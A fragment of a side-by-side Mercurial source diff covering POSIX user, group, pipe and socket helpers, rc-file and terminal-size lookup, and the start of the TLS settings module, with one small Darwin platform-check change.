528 If uid is None, return the name of the current user."""
528 If uid is None, return the name of the current user."""
529
529
530 if uid is None:
530 if uid is None:
531 uid = os.getuid()
531 uid = os.getuid()
532 try:
532 try:
533 return pwd.getpwuid(uid)[0]
533 return pwd.getpwuid(uid)[0]
534 except KeyError:
534 except KeyError:
535 return str(uid)
535 return str(uid)
536
536
537 def groupname(gid=None):
537 def groupname(gid=None):
538 """Return the name of the group with the given gid.
538 """Return the name of the group with the given gid.
539
539
540 If gid is None, return the name of the current group."""
540 If gid is None, return the name of the current group."""
541
541
542 if gid is None:
542 if gid is None:
543 gid = os.getgid()
543 gid = os.getgid()
544 try:
544 try:
545 return grp.getgrgid(gid)[0]
545 return grp.getgrgid(gid)[0]
546 except KeyError:
546 except KeyError:
547 return str(gid)
547 return str(gid)
548
548
549 def groupmembers(name):
549 def groupmembers(name):
550 """Return the list of members of the group with the given
550 """Return the list of members of the group with the given
551 name, KeyError if the group does not exist.
551 name, KeyError if the group does not exist.
552 """
552 """
553 return list(grp.getgrnam(name).gr_mem)
553 return list(grp.getgrnam(name).gr_mem)
554
554
555 def spawndetached(args):
555 def spawndetached(args):
556 return os.spawnvp(os.P_NOWAIT | getattr(os, 'P_DETACH', 0),
556 return os.spawnvp(os.P_NOWAIT | getattr(os, 'P_DETACH', 0),
557 args[0], args)
557 args[0], args)
558
558
559 def gethgcmd():
559 def gethgcmd():
560 return sys.argv[:1]
560 return sys.argv[:1]
561
561
562 def makedir(path, notindexed):
562 def makedir(path, notindexed):
563 os.mkdir(path)
563 os.mkdir(path)
564
564
565 def lookupreg(key, name=None, scope=None):
565 def lookupreg(key, name=None, scope=None):
566 return None
566 return None
567
567
568 def hidewindow():
568 def hidewindow():
569 """Hide current shell window.
569 """Hide current shell window.
570
570
571 Used to hide the window opened when starting asynchronous
571 Used to hide the window opened when starting asynchronous
572 child process under Windows, unneeded on other systems.
572 child process under Windows, unneeded on other systems.
573 """
573 """
574 pass
574 pass
575
575
576 class cachestat(object):
576 class cachestat(object):
577 def __init__(self, path):
577 def __init__(self, path):
578 self.stat = os.stat(path)
578 self.stat = os.stat(path)
579
579
580 def cacheable(self):
580 def cacheable(self):
581 return bool(self.stat.st_ino)
581 return bool(self.stat.st_ino)
582
582
583 __hash__ = object.__hash__
583 __hash__ = object.__hash__
584
584
585 def __eq__(self, other):
585 def __eq__(self, other):
586 try:
586 try:
587 # Only dev, ino, size, mtime and atime are likely to change. Out
587 # Only dev, ino, size, mtime and atime are likely to change. Out
588 # of these, we shouldn't compare atime but should compare the
588 # of these, we shouldn't compare atime but should compare the
589 # rest. However, one of the other fields changing indicates
589 # rest. However, one of the other fields changing indicates
590 # something fishy going on, so return False if anything but atime
590 # something fishy going on, so return False if anything but atime
591 # changes.
591 # changes.
592 return (self.stat.st_mode == other.stat.st_mode and
592 return (self.stat.st_mode == other.stat.st_mode and
593 self.stat.st_ino == other.stat.st_ino and
593 self.stat.st_ino == other.stat.st_ino and
594 self.stat.st_dev == other.stat.st_dev and
594 self.stat.st_dev == other.stat.st_dev and
595 self.stat.st_nlink == other.stat.st_nlink and
595 self.stat.st_nlink == other.stat.st_nlink and
596 self.stat.st_uid == other.stat.st_uid and
596 self.stat.st_uid == other.stat.st_uid and
597 self.stat.st_gid == other.stat.st_gid and
597 self.stat.st_gid == other.stat.st_gid and
598 self.stat.st_size == other.stat.st_size and
598 self.stat.st_size == other.stat.st_size and
599 self.stat.st_mtime == other.stat.st_mtime and
599 self.stat.st_mtime == other.stat.st_mtime and
600 self.stat.st_ctime == other.stat.st_ctime)
600 self.stat.st_ctime == other.stat.st_ctime)
601 except AttributeError:
601 except AttributeError:
602 return False
602 return False
603
603
604 def __ne__(self, other):
604 def __ne__(self, other):
605 return not self == other
605 return not self == other
606
606
607 def executablepath():
607 def executablepath():
608 return None # available on Windows only
608 return None # available on Windows only
609
609
610 def statislink(st):
610 def statislink(st):
611 '''check whether a stat result is a symlink'''
611 '''check whether a stat result is a symlink'''
612 return st and stat.S_ISLNK(st.st_mode)
612 return st and stat.S_ISLNK(st.st_mode)
613
613
614 def statisexec(st):
614 def statisexec(st):
615 '''check whether a stat result is an executable file'''
615 '''check whether a stat result is an executable file'''
616 return st and (st.st_mode & 0o100 != 0)
616 return st and (st.st_mode & 0o100 != 0)
617
617
618 def poll(fds):
618 def poll(fds):
619 """block until something happens on any file descriptor
619 """block until something happens on any file descriptor
620
620
621 This is a generic helper that will check for any activity
621 This is a generic helper that will check for any activity
622 (read, write. exception) and return the list of touched files.
622 (read, write. exception) and return the list of touched files.
623
623
624 In unsupported cases, it will raise a NotImplementedError"""
624 In unsupported cases, it will raise a NotImplementedError"""
625 try:
625 try:
626 while True:
626 while True:
627 try:
627 try:
628 res = select.select(fds, fds, fds)
628 res = select.select(fds, fds, fds)
629 break
629 break
630 except select.error as inst:
630 except select.error as inst:
631 if inst.args[0] == errno.EINTR:
631 if inst.args[0] == errno.EINTR:
632 continue
632 continue
633 raise
633 raise
634 except ValueError: # out of range file descriptor
634 except ValueError: # out of range file descriptor
635 raise NotImplementedError()
635 raise NotImplementedError()
636 return sorted(list(set(sum(res, []))))
636 return sorted(list(set(sum(res, []))))
637
637
638 def readpipe(pipe):
638 def readpipe(pipe):
639 """Read all available data from a pipe."""
639 """Read all available data from a pipe."""
640 # We can't fstat() a pipe because Linux will always report 0.
640 # We can't fstat() a pipe because Linux will always report 0.
641 # So, we set the pipe to non-blocking mode and read everything
641 # So, we set the pipe to non-blocking mode and read everything
642 # that's available.
642 # that's available.
643 flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
643 flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
644 flags |= os.O_NONBLOCK
644 flags |= os.O_NONBLOCK
645 oldflags = fcntl.fcntl(pipe, fcntl.F_SETFL, flags)
645 oldflags = fcntl.fcntl(pipe, fcntl.F_SETFL, flags)
646
646
647 try:
647 try:
648 chunks = []
648 chunks = []
649 while True:
649 while True:
650 try:
650 try:
651 s = pipe.read()
651 s = pipe.read()
652 if not s:
652 if not s:
653 break
653 break
654 chunks.append(s)
654 chunks.append(s)
655 except IOError:
655 except IOError:
656 break
656 break
657
657
658 return ''.join(chunks)
658 return ''.join(chunks)
659 finally:
659 finally:
660 fcntl.fcntl(pipe, fcntl.F_SETFL, oldflags)
660 fcntl.fcntl(pipe, fcntl.F_SETFL, oldflags)
661
661
662 def bindunixsocket(sock, path):
662 def bindunixsocket(sock, path):
663 """Bind the UNIX domain socket to the specified path"""
663 """Bind the UNIX domain socket to the specified path"""
664 # use relative path instead of full path at bind() if possible, since
664 # use relative path instead of full path at bind() if possible, since
665 # AF_UNIX path has very small length limit (107 chars) on common
665 # AF_UNIX path has very small length limit (107 chars) on common
666 # platforms (see sys/un.h)
666 # platforms (see sys/un.h)
667 dirname, basename = os.path.split(path)
667 dirname, basename = os.path.split(path)
668 bakwdfd = None
668 bakwdfd = None
669 if dirname:
669 if dirname:
670 bakwdfd = os.open('.', os.O_DIRECTORY)
670 bakwdfd = os.open('.', os.O_DIRECTORY)
671 os.chdir(dirname)
671 os.chdir(dirname)
672 sock.bind(basename)
672 sock.bind(basename)
673 if bakwdfd:
673 if bakwdfd:
674 os.fchdir(bakwdfd)
674 os.fchdir(bakwdfd)
675 os.close(bakwdfd)
675 os.close(bakwdfd)
@@ -1,85 +1,85 b''
1 from __future__ import absolute_import
1 from __future__ import absolute_import
2
2
3 import array
3 import array
4 import errno
4 import errno
5 import fcntl
5 import fcntl
6 import os
6 import os
7 import sys
7 import sys
8
8
9 from . import (
9 from . import (
10 encoding,
10 encoding,
11 pycompat,
11 pycompat,
12 util,
12 util,
13 )
13 )
14
14
15 # BSD 'more' escapes ANSI color sequences by default. This can be disabled by
15 # BSD 'more' escapes ANSI color sequences by default. This can be disabled by
16 # $MORE variable, but there's no compatible option with Linux 'more'. Given
16 # $MORE variable, but there's no compatible option with Linux 'more'. Given
17 # OS X is widely used and most modern Unix systems would have 'less', setting
17 # OS X is widely used and most modern Unix systems would have 'less', setting
18 # 'less' as the default seems reasonable.
18 # 'less' as the default seems reasonable.
19 fallbackpager = 'less'
19 fallbackpager = 'less'
20
20
21 def _rcfiles(path):
21 def _rcfiles(path):
22 rcs = [os.path.join(path, 'hgrc')]
22 rcs = [os.path.join(path, 'hgrc')]
23 rcdir = os.path.join(path, 'hgrc.d')
23 rcdir = os.path.join(path, 'hgrc.d')
24 try:
24 try:
25 rcs.extend([os.path.join(rcdir, f)
25 rcs.extend([os.path.join(rcdir, f)
26 for f, kind in util.listdir(rcdir)
26 for f, kind in util.listdir(rcdir)
27 if f.endswith(".rc")])
27 if f.endswith(".rc")])
28 except OSError:
28 except OSError:
29 pass
29 pass
30 return rcs
30 return rcs
31
31
32 def systemrcpath():
32 def systemrcpath():
33 path = []
33 path = []
34 if pycompat.sysplatform == 'plan9':
34 if pycompat.sysplatform == 'plan9':
35 root = 'lib/mercurial'
35 root = 'lib/mercurial'
36 else:
36 else:
37 root = 'etc/mercurial'
37 root = 'etc/mercurial'
38 # old mod_python does not set sys.argv
38 # old mod_python does not set sys.argv
39 if len(getattr(sys, 'argv', [])) > 0:
39 if len(getattr(sys, 'argv', [])) > 0:
40 p = os.path.dirname(os.path.dirname(pycompat.sysargv[0]))
40 p = os.path.dirname(os.path.dirname(pycompat.sysargv[0]))
41 if p != '/':
41 if p != '/':
42 path.extend(_rcfiles(os.path.join(p, root)))
42 path.extend(_rcfiles(os.path.join(p, root)))
43 path.extend(_rcfiles('/' + root))
43 path.extend(_rcfiles('/' + root))
44 return path
44 return path
45
45
46 def userrcpath():
46 def userrcpath():
47 if pycompat.sysplatform == 'plan9':
47 if pycompat.sysplatform == 'plan9':
48 return [encoding.environ['home'] + '/lib/hgrc']
48 return [encoding.environ['home'] + '/lib/hgrc']
49 elif pycompat.sysplatform == 'darwin':
49 elif pycompat.isdarwin:
50 return [os.path.expanduser('~/.hgrc')]
50 return [os.path.expanduser('~/.hgrc')]
51 else:
51 else:
52 confighome = encoding.environ.get('XDG_CONFIG_HOME')
52 confighome = encoding.environ.get('XDG_CONFIG_HOME')
53 if confighome is None or not os.path.isabs(confighome):
53 if confighome is None or not os.path.isabs(confighome):
54 confighome = os.path.expanduser('~/.config')
54 confighome = os.path.expanduser('~/.config')
55
55
56 return [os.path.expanduser('~/.hgrc'),
56 return [os.path.expanduser('~/.hgrc'),
57 os.path.join(confighome, 'hg', 'hgrc')]
57 os.path.join(confighome, 'hg', 'hgrc')]
58
58
59 def termsize(ui):
59 def termsize(ui):
60 try:
60 try:
61 import termios
61 import termios
62 TIOCGWINSZ = termios.TIOCGWINSZ # unavailable on IRIX (issue3449)
62 TIOCGWINSZ = termios.TIOCGWINSZ # unavailable on IRIX (issue3449)
63 except (AttributeError, ImportError):
63 except (AttributeError, ImportError):
64 return 80, 24
64 return 80, 24
65
65
66 for dev in (ui.ferr, ui.fout, ui.fin):
66 for dev in (ui.ferr, ui.fout, ui.fin):
67 try:
67 try:
68 try:
68 try:
69 fd = dev.fileno()
69 fd = dev.fileno()
70 except AttributeError:
70 except AttributeError:
71 continue
71 continue
72 if not os.isatty(fd):
72 if not os.isatty(fd):
73 continue
73 continue
74 arri = fcntl.ioctl(fd, TIOCGWINSZ, '\0' * 8)
74 arri = fcntl.ioctl(fd, TIOCGWINSZ, '\0' * 8)
75 height, width = array.array(r'h', arri)[:2]
75 height, width = array.array(r'h', arri)[:2]
76 if width > 0 and height > 0:
76 if width > 0 and height > 0:
77 return width, height
77 return width, height
78 except ValueError:
78 except ValueError:
79 pass
79 pass
80 except IOError as e:
80 except IOError as e:
81 if e[0] == errno.EINVAL:
81 if e[0] == errno.EINVAL:
82 pass
82 pass
83 else:
83 else:
84 raise
84 raise
85 return 80, 24
85 return 80, 24
@@ -1,865 +1,865 b''
1 # sslutil.py - SSL handling for mercurial
1 # sslutil.py - SSL handling for mercurial
2 #
2 #
3 # Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
4 # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
4 # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 from __future__ import absolute_import
10 from __future__ import absolute_import
11
11
12 import hashlib
12 import hashlib
13 import os
13 import os
14 import re
14 import re
15 import ssl
15 import ssl
16
16
17 from .i18n import _
17 from .i18n import _
18 from . import (
18 from . import (
19 error,
19 error,
20 pycompat,
20 pycompat,
21 util,
21 util,
22 )
22 )
23
23
24 # Python 2.7.9+ overhauled the built-in SSL/TLS features of Python. It added
24 # Python 2.7.9+ overhauled the built-in SSL/TLS features of Python. It added
25 # support for TLS 1.1, TLS 1.2, SNI, system CA stores, etc. These features are
25 # support for TLS 1.1, TLS 1.2, SNI, system CA stores, etc. These features are
26 # all exposed via the "ssl" module.
26 # all exposed via the "ssl" module.
27 #
27 #
28 # Depending on the version of Python being used, SSL/TLS support is either
28 # Depending on the version of Python being used, SSL/TLS support is either
29 # modern/secure or legacy/insecure. Many operations in this module have
29 # modern/secure or legacy/insecure. Many operations in this module have
30 # separate code paths depending on support in Python.
30 # separate code paths depending on support in Python.
31
31
32 configprotocols = {
32 configprotocols = {
33 'tls1.0',
33 'tls1.0',
34 'tls1.1',
34 'tls1.1',
35 'tls1.2',
35 'tls1.2',
36 }
36 }
37
37
38 hassni = getattr(ssl, 'HAS_SNI', False)
38 hassni = getattr(ssl, 'HAS_SNI', False)
39
39
40 # TLS 1.1 and 1.2 may not be supported if the OpenSSL Python is compiled
40 # TLS 1.1 and 1.2 may not be supported if the OpenSSL Python is compiled
41 # against doesn't support them.
41 # against doesn't support them.
42 supportedprotocols = {'tls1.0'}
42 supportedprotocols = {'tls1.0'}
43 if util.safehasattr(ssl, 'PROTOCOL_TLSv1_1'):
43 if util.safehasattr(ssl, 'PROTOCOL_TLSv1_1'):
44 supportedprotocols.add('tls1.1')
44 supportedprotocols.add('tls1.1')
45 if util.safehasattr(ssl, 'PROTOCOL_TLSv1_2'):
45 if util.safehasattr(ssl, 'PROTOCOL_TLSv1_2'):
46 supportedprotocols.add('tls1.2')
46 supportedprotocols.add('tls1.2')
47
47
48 try:
48 try:
49 # ssl.SSLContext was added in 2.7.9 and presence indicates modern
49 # ssl.SSLContext was added in 2.7.9 and presence indicates modern
50 # SSL/TLS features are available.
50 # SSL/TLS features are available.
51 SSLContext = ssl.SSLContext
51 SSLContext = ssl.SSLContext
52 modernssl = True
52 modernssl = True
53 _canloaddefaultcerts = util.safehasattr(SSLContext, 'load_default_certs')
53 _canloaddefaultcerts = util.safehasattr(SSLContext, 'load_default_certs')
54 except AttributeError:
54 except AttributeError:
55 modernssl = False
55 modernssl = False
56 _canloaddefaultcerts = False
56 _canloaddefaultcerts = False
57
57
58 # We implement SSLContext using the interface from the standard library.
58 # We implement SSLContext using the interface from the standard library.
59 class SSLContext(object):
59 class SSLContext(object):
60 def __init__(self, protocol):
60 def __init__(self, protocol):
61 # From the public interface of SSLContext
61 # From the public interface of SSLContext
62 self.protocol = protocol
62 self.protocol = protocol
63 self.check_hostname = False
63 self.check_hostname = False
64 self.options = 0
64 self.options = 0
65 self.verify_mode = ssl.CERT_NONE
65 self.verify_mode = ssl.CERT_NONE
66
66
67 # Used by our implementation.
67 # Used by our implementation.
68 self._certfile = None
68 self._certfile = None
69 self._keyfile = None
69 self._keyfile = None
70 self._certpassword = None
70 self._certpassword = None
71 self._cacerts = None
71 self._cacerts = None
72 self._ciphers = None
72 self._ciphers = None
73
73
74 def load_cert_chain(self, certfile, keyfile=None, password=None):
74 def load_cert_chain(self, certfile, keyfile=None, password=None):
75 self._certfile = certfile
75 self._certfile = certfile
76 self._keyfile = keyfile
76 self._keyfile = keyfile
77 self._certpassword = password
77 self._certpassword = password
78
78
79 def load_default_certs(self, purpose=None):
79 def load_default_certs(self, purpose=None):
80 pass
80 pass
81
81
82 def load_verify_locations(self, cafile=None, capath=None, cadata=None):
82 def load_verify_locations(self, cafile=None, capath=None, cadata=None):
83 if capath:
83 if capath:
84 raise error.Abort(_('capath not supported'))
84 raise error.Abort(_('capath not supported'))
85 if cadata:
85 if cadata:
86 raise error.Abort(_('cadata not supported'))
86 raise error.Abort(_('cadata not supported'))
87
87
88 self._cacerts = cafile
88 self._cacerts = cafile
89
89
90 def set_ciphers(self, ciphers):
90 def set_ciphers(self, ciphers):
91 self._ciphers = ciphers
91 self._ciphers = ciphers
92
92
93 def wrap_socket(self, socket, server_hostname=None, server_side=False):
93 def wrap_socket(self, socket, server_hostname=None, server_side=False):
94 # server_hostname is unique to SSLContext.wrap_socket and is used
94 # server_hostname is unique to SSLContext.wrap_socket and is used
95 # for SNI in that context. So there's nothing for us to do with it
95 # for SNI in that context. So there's nothing for us to do with it
96 # in this legacy code since we don't support SNI.
96 # in this legacy code since we don't support SNI.
97
97
98 args = {
98 args = {
99 'keyfile': self._keyfile,
99 'keyfile': self._keyfile,
100 'certfile': self._certfile,
100 'certfile': self._certfile,
101 'server_side': server_side,
101 'server_side': server_side,
102 'cert_reqs': self.verify_mode,
102 'cert_reqs': self.verify_mode,
103 'ssl_version': self.protocol,
103 'ssl_version': self.protocol,
104 'ca_certs': self._cacerts,
104 'ca_certs': self._cacerts,
105 'ciphers': self._ciphers,
105 'ciphers': self._ciphers,
106 }
106 }
107
107
108 return ssl.wrap_socket(socket, **args)
108 return ssl.wrap_socket(socket, **args)
109
109
110 def _hostsettings(ui, hostname):
110 def _hostsettings(ui, hostname):
111 """Obtain security settings for a hostname.
111 """Obtain security settings for a hostname.
112
112
113 Returns a dict of settings relevant to that hostname.
113 Returns a dict of settings relevant to that hostname.
114 """
114 """
115 s = {
115 s = {
116 # Whether we should attempt to load default/available CA certs
116 # Whether we should attempt to load default/available CA certs
117 # if an explicit ``cafile`` is not defined.
117 # if an explicit ``cafile`` is not defined.
118 'allowloaddefaultcerts': True,
118 'allowloaddefaultcerts': True,
119 # List of 2-tuple of (hash algorithm, hash).
119 # List of 2-tuple of (hash algorithm, hash).
120 'certfingerprints': [],
120 'certfingerprints': [],
121 # Path to file containing concatenated CA certs. Used by
121 # Path to file containing concatenated CA certs. Used by
122 # SSLContext.load_verify_locations().
122 # SSLContext.load_verify_locations().
123 'cafile': None,
123 'cafile': None,
124 # Whether certificate verification should be disabled.
124 # Whether certificate verification should be disabled.
125 'disablecertverification': False,
125 'disablecertverification': False,
126 # Whether the legacy [hostfingerprints] section has data for this host.
126 # Whether the legacy [hostfingerprints] section has data for this host.
127 'legacyfingerprint': False,
127 'legacyfingerprint': False,
128 # PROTOCOL_* constant to use for SSLContext.__init__.
128 # PROTOCOL_* constant to use for SSLContext.__init__.
129 'protocol': None,
129 'protocol': None,
130 # String representation of minimum protocol to be used for UI
130 # String representation of minimum protocol to be used for UI
131 # presentation.
131 # presentation.
132 'protocolui': None,
132 'protocolui': None,
133 # ssl.CERT_* constant used by SSLContext.verify_mode.
133 # ssl.CERT_* constant used by SSLContext.verify_mode.
134 'verifymode': None,
134 'verifymode': None,
135 # Defines extra ssl.OP* bitwise options to set.
135 # Defines extra ssl.OP* bitwise options to set.
136 'ctxoptions': None,
136 'ctxoptions': None,
137 # OpenSSL Cipher List to use (instead of default).
137 # OpenSSL Cipher List to use (instead of default).
138 'ciphers': None,
138 'ciphers': None,
139 }
139 }
140
140
141 # Allow minimum TLS protocol to be specified in the config.
141 # Allow minimum TLS protocol to be specified in the config.
142 def validateprotocol(protocol, key):
142 def validateprotocol(protocol, key):
143 if protocol not in configprotocols:
143 if protocol not in configprotocols:
144 raise error.Abort(
144 raise error.Abort(
145 _('unsupported protocol from hostsecurity.%s: %s') %
145 _('unsupported protocol from hostsecurity.%s: %s') %
146 (key, protocol),
146 (key, protocol),
147 hint=_('valid protocols: %s') %
147 hint=_('valid protocols: %s') %
148 ' '.join(sorted(configprotocols)))
148 ' '.join(sorted(configprotocols)))
149
149
150 # We default to TLS 1.1+ where we can because TLS 1.0 has known
150 # We default to TLS 1.1+ where we can because TLS 1.0 has known
151 # vulnerabilities (like BEAST and POODLE). We allow users to downgrade to
151 # vulnerabilities (like BEAST and POODLE). We allow users to downgrade to
152 # TLS 1.0+ via config options in case a legacy server is encountered.
152 # TLS 1.0+ via config options in case a legacy server is encountered.
153 if 'tls1.1' in supportedprotocols:
153 if 'tls1.1' in supportedprotocols:
154 defaultprotocol = 'tls1.1'
154 defaultprotocol = 'tls1.1'
155 else:
155 else:
156 # Let people know they are borderline secure.
156 # Let people know they are borderline secure.
157 # We don't document this config option because we want people to see
157 # We don't document this config option because we want people to see
158 # the bold warnings on the web site.
158 # the bold warnings on the web site.
159 # internal config: hostsecurity.disabletls10warning
159 # internal config: hostsecurity.disabletls10warning
160 if not ui.configbool('hostsecurity', 'disabletls10warning'):
160 if not ui.configbool('hostsecurity', 'disabletls10warning'):
161 ui.warn(_('warning: connecting to %s using legacy security '
161 ui.warn(_('warning: connecting to %s using legacy security '
162 'technology (TLS 1.0); see '
162 'technology (TLS 1.0); see '
163 'https://mercurial-scm.org/wiki/SecureConnections for '
163 'https://mercurial-scm.org/wiki/SecureConnections for '
164 'more info\n') % hostname)
164 'more info\n') % hostname)
165 defaultprotocol = 'tls1.0'
165 defaultprotocol = 'tls1.0'
166
166
167 key = 'minimumprotocol'
167 key = 'minimumprotocol'
168 protocol = ui.config('hostsecurity', key, defaultprotocol)
168 protocol = ui.config('hostsecurity', key, defaultprotocol)
169 validateprotocol(protocol, key)
169 validateprotocol(protocol, key)
170
170
171 key = '%s:minimumprotocol' % hostname
171 key = '%s:minimumprotocol' % hostname
172 protocol = ui.config('hostsecurity', key, protocol)
172 protocol = ui.config('hostsecurity', key, protocol)
173 validateprotocol(protocol, key)
173 validateprotocol(protocol, key)
174
174
175 # If --insecure is used, we allow the use of TLS 1.0 despite config options.
175 # If --insecure is used, we allow the use of TLS 1.0 despite config options.
176 # We always print a "connection security to %s is disabled..." message when
176 # We always print a "connection security to %s is disabled..." message when
177 # --insecure is used. So no need to print anything more here.
177 # --insecure is used. So no need to print anything more here.
178 if ui.insecureconnections:
178 if ui.insecureconnections:
179 protocol = 'tls1.0'
179 protocol = 'tls1.0'
180
180
181 s['protocol'], s['ctxoptions'], s['protocolui'] = protocolsettings(protocol)
181 s['protocol'], s['ctxoptions'], s['protocolui'] = protocolsettings(protocol)
182
182
183 ciphers = ui.config('hostsecurity', 'ciphers')
183 ciphers = ui.config('hostsecurity', 'ciphers')
184 ciphers = ui.config('hostsecurity', '%s:ciphers' % hostname, ciphers)
184 ciphers = ui.config('hostsecurity', '%s:ciphers' % hostname, ciphers)
185 s['ciphers'] = ciphers
185 s['ciphers'] = ciphers
186
186
187 # Look for fingerprints in [hostsecurity] section. Value is a list
187 # Look for fingerprints in [hostsecurity] section. Value is a list
188 # of <alg>:<fingerprint> strings.
188 # of <alg>:<fingerprint> strings.
189 fingerprints = ui.configlist('hostsecurity', '%s:fingerprints' % hostname,
189 fingerprints = ui.configlist('hostsecurity', '%s:fingerprints' % hostname,
190 [])
190 [])
191 for fingerprint in fingerprints:
191 for fingerprint in fingerprints:
192 if not (fingerprint.startswith(('sha1:', 'sha256:', 'sha512:'))):
192 if not (fingerprint.startswith(('sha1:', 'sha256:', 'sha512:'))):
193 raise error.Abort(_('invalid fingerprint for %s: %s') % (
193 raise error.Abort(_('invalid fingerprint for %s: %s') % (
194 hostname, fingerprint),
194 hostname, fingerprint),
195 hint=_('must begin with "sha1:", "sha256:", '
195 hint=_('must begin with "sha1:", "sha256:", '
196 'or "sha512:"'))
196 'or "sha512:"'))
197
197
198 alg, fingerprint = fingerprint.split(':', 1)
198 alg, fingerprint = fingerprint.split(':', 1)
199 fingerprint = fingerprint.replace(':', '').lower()
199 fingerprint = fingerprint.replace(':', '').lower()
200 s['certfingerprints'].append((alg, fingerprint))
200 s['certfingerprints'].append((alg, fingerprint))
201
201
202 # Fingerprints from [hostfingerprints] are always SHA-1.
202 # Fingerprints from [hostfingerprints] are always SHA-1.
203 for fingerprint in ui.configlist('hostfingerprints', hostname, []):
203 for fingerprint in ui.configlist('hostfingerprints', hostname, []):
204 fingerprint = fingerprint.replace(':', '').lower()
204 fingerprint = fingerprint.replace(':', '').lower()
205 s['certfingerprints'].append(('sha1', fingerprint))
205 s['certfingerprints'].append(('sha1', fingerprint))
206 s['legacyfingerprint'] = True
206 s['legacyfingerprint'] = True
207
207
208 # If a host cert fingerprint is defined, it is the only thing that
208 # If a host cert fingerprint is defined, it is the only thing that
209 # matters. No need to validate CA certs.
209 # matters. No need to validate CA certs.
210 if s['certfingerprints']:
210 if s['certfingerprints']:
211 s['verifymode'] = ssl.CERT_NONE
211 s['verifymode'] = ssl.CERT_NONE
212 s['allowloaddefaultcerts'] = False
212 s['allowloaddefaultcerts'] = False
213
213
214 # If --insecure is used, don't take CAs into consideration.
214 # If --insecure is used, don't take CAs into consideration.
215 elif ui.insecureconnections:
215 elif ui.insecureconnections:
216 s['disablecertverification'] = True
216 s['disablecertverification'] = True
217 s['verifymode'] = ssl.CERT_NONE
217 s['verifymode'] = ssl.CERT_NONE
218 s['allowloaddefaultcerts'] = False
218 s['allowloaddefaultcerts'] = False
219
219
220 if ui.configbool('devel', 'disableloaddefaultcerts'):
220 if ui.configbool('devel', 'disableloaddefaultcerts'):
221 s['allowloaddefaultcerts'] = False
221 s['allowloaddefaultcerts'] = False
222
222
223 # If both fingerprints and a per-host ca file are specified, issue a warning
223 # If both fingerprints and a per-host ca file are specified, issue a warning
224 # because users should not be surprised about what security is or isn't
224 # because users should not be surprised about what security is or isn't
225 # being performed.
225 # being performed.
226 cafile = ui.config('hostsecurity', '%s:verifycertsfile' % hostname)
226 cafile = ui.config('hostsecurity', '%s:verifycertsfile' % hostname)
227 if s['certfingerprints'] and cafile:
227 if s['certfingerprints'] and cafile:
228 ui.warn(_('(hostsecurity.%s:verifycertsfile ignored when host '
228 ui.warn(_('(hostsecurity.%s:verifycertsfile ignored when host '
229 'fingerprints defined; using host fingerprints for '
229 'fingerprints defined; using host fingerprints for '
230 'verification)\n') % hostname)
230 'verification)\n') % hostname)
231
231
232 # Try to hook up CA certificate validation unless something above
232 # Try to hook up CA certificate validation unless something above
233 # makes it not necessary.
233 # makes it not necessary.
234 if s['verifymode'] is None:
234 if s['verifymode'] is None:
235 # Look at per-host ca file first.
235 # Look at per-host ca file first.
236 if cafile:
236 if cafile:
237 cafile = util.expandpath(cafile)
237 cafile = util.expandpath(cafile)
238 if not os.path.exists(cafile):
238 if not os.path.exists(cafile):
239 raise error.Abort(_('path specified by %s does not exist: %s') %
239 raise error.Abort(_('path specified by %s does not exist: %s') %
240 ('hostsecurity.%s:verifycertsfile' % hostname,
240 ('hostsecurity.%s:verifycertsfile' % hostname,
241 cafile))
241 cafile))
242 s['cafile'] = cafile
242 s['cafile'] = cafile
243 else:
243 else:
244 # Find global certificates file in config.
244 # Find global certificates file in config.
245 cafile = ui.config('web', 'cacerts')
245 cafile = ui.config('web', 'cacerts')
246
246
247 if cafile:
247 if cafile:
248 cafile = util.expandpath(cafile)
248 cafile = util.expandpath(cafile)
249 if not os.path.exists(cafile):
249 if not os.path.exists(cafile):
250 raise error.Abort(_('could not find web.cacerts: %s') %
250 raise error.Abort(_('could not find web.cacerts: %s') %
251 cafile)
251 cafile)
252 elif s['allowloaddefaultcerts']:
252 elif s['allowloaddefaultcerts']:
253 # CAs not defined in config. Try to find system bundles.
253 # CAs not defined in config. Try to find system bundles.
254 cafile = _defaultcacerts(ui)
254 cafile = _defaultcacerts(ui)
255 if cafile:
255 if cafile:
256 ui.debug('using %s for CA file\n' % cafile)
256 ui.debug('using %s for CA file\n' % cafile)
257
257
258 s['cafile'] = cafile
258 s['cafile'] = cafile
259
259
260 # Require certificate validation if CA certs are being loaded and
260 # Require certificate validation if CA certs are being loaded and
261 # verification hasn't been disabled above.
261 # verification hasn't been disabled above.
262 if cafile or (_canloaddefaultcerts and s['allowloaddefaultcerts']):
262 if cafile or (_canloaddefaultcerts and s['allowloaddefaultcerts']):
263 s['verifymode'] = ssl.CERT_REQUIRED
263 s['verifymode'] = ssl.CERT_REQUIRED
264 else:
264 else:
265 # At this point we don't have a fingerprint, aren't being
265 # At this point we don't have a fingerprint, aren't being
266 # explicitly insecure, and can't load CA certs. Connecting
266 # explicitly insecure, and can't load CA certs. Connecting
267 # is insecure. We allow the connection and abort during
267 # is insecure. We allow the connection and abort during
268 # validation (once we have the fingerprint to print to the
268 # validation (once we have the fingerprint to print to the
269 # user).
269 # user).
270 s['verifymode'] = ssl.CERT_NONE
270 s['verifymode'] = ssl.CERT_NONE
271
271
272 assert s['protocol'] is not None
272 assert s['protocol'] is not None
273 assert s['ctxoptions'] is not None
273 assert s['ctxoptions'] is not None
274 assert s['verifymode'] is not None
274 assert s['verifymode'] is not None
275
275
276 return s
276 return s
277
277
278 def protocolsettings(protocol):
278 def protocolsettings(protocol):
279 """Resolve the protocol for a config value.
279 """Resolve the protocol for a config value.
280
280
281 Returns a 3-tuple of (protocol, options, ui value) where the first
281 Returns a 3-tuple of (protocol, options, ui value) where the first
282 2 items are values used by SSLContext and the last is a string value
282 2 items are values used by SSLContext and the last is a string value
283 of the ``minimumprotocol`` config option equivalent.
283 of the ``minimumprotocol`` config option equivalent.
284 """
284 """
